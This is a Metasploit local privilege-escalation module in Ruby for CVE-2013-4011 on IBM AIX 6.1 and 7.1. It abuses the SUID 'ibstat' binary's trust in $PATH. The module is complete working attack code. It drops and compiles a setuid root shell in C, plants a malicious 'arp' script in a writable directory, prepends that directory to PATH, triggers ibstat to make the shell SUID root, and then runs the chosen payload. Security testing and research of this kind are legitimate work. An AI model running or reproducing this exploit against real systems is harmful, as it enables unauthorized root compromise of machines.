ibstat $PATH Privilege Escalation

`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class Metasploit4 < Msf::Exploit::Local  
  
Rank = ExcellentRanking  
  
include Msf::Post::File  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
"Name" => "ibstat $PATH Privilege Escalation",  
"Description" => %q{  
This module exploits the trusted $PATH environment variable of the SUID binary "ibstat".  
},  
"Author" => [  
"Kristian Erik Hermansen", #original author  
"Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>", #Metasploit module  
"Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>" #Metasploit module  
],  
"References" => [  
["CVE", "2013-4011"],  
["OSVDB", "95420"],  
["BID", "61287"],  
["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827"],  
["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"]  
],  
"Platform" => ["unix"],  
"Arch" => ARCH_CMD,  
"Payload" => {  
"Compat" => {  
"PayloadType" => "cmd",  
"RequiredCmd" => "perl"  
}  
},  
"Targets" => [  
["IBM AIX Version 6.1", {}],  
["IBM AIX Version 7.1", {}]  
],  
"DefaultTarget" => 1,  
"DisclosureDate" => "Sep 24 2013"  
))  
  
register_options([  
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])  
], self.class)  
end  
  
def check  
find_output = cmd_exec("find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null")  
  
if find_output.include?("ibstat")  
return Exploit::CheckCode::Vulnerable  
end  
  
Exploit::CheckCode::Safe  
end  
  
def exploit  
if check == Exploit::CheckCode::Safe  
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")  
else  
print_good("Target is vulnerable.")  
end  
  
root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"  
arp_file = "#{datastore["WritableDir"]}/arp"  
c_file = %Q^#include <stdio.h>  
  
int main()  
{  
setreuid(0,0);  
setregid(0,0);  
execve("/bin/sh",NULL,NULL);  
return 0;  
}  
^  
arp = %Q^#!/bin/sh  
  
chown root #{root_file}  
chmod 4555 #{root_file}  
^  
  
if gcc_installed?  
print_status("Dropping file #{root_file}.c...")  
write_file("#{root_file}.c", c_file)  
  
print_status("Compiling source...")  
cmd_exec("gcc -o #{root_file} #{root_file}.c")  
print_status("Compilation completed")  
  
register_file_for_cleanup("#{root_file}.c")  
else  
cmd_exec("cp /bin/sh #{root_file}")  
end  
  
register_file_for_cleanup(root_file)  
  
print_status("Writing custom arp file...")  
write_file(arp_file,arp)  
register_file_for_cleanup(arp_file)  
cmd_exec("chmod 0555 #{arp_file}")  
print_status("Custom arp file written")  
  
print_status("Updating $PATH environment variable...")  
path_env = cmd_exec("echo $PATH")  
cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH")  
cmd_exec("export PATH")  
  
print_status("Triggering vulnerablity...")  
cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null")  
  
# The $PATH variable must be restored before the payload is executed  
# in cases where an euid root shell was gained  
print_status("Restoring $PATH environment variable...")  
cmd_exec("PATH=#{path_env}")  
cmd_exec("export PATH")  
  
cmd_exec(root_file)  
print_status("Checking root privileges...")  
  
if is_root?  
print_status("Executing payload...")  
cmd_exec(payload.encoded)  
end  
end  
  
def gcc_installed?  
print_status("Checking if gcc exists...")  
gcc_whereis_output = cmd_exec("whereis -b gcc")  
  
if gcc_whereis_output.include?("/")  
print_good("gcc found!")  
return true  
end  
  
print_status("gcc not found. Using /bin/sh from local system")  
false  
end  
  
def is_root?  
id_output = cmd_exec("id")  
  
if id_output.include?("euid=0(root)")  
print_good("Got root! (euid)")  
return true  
end  
if id_output.include?("uid=0(root)")  
print_good("Got root!")  
return true  
end  
  
print_status("Exploit failed")  
false  
end  
  
end  
`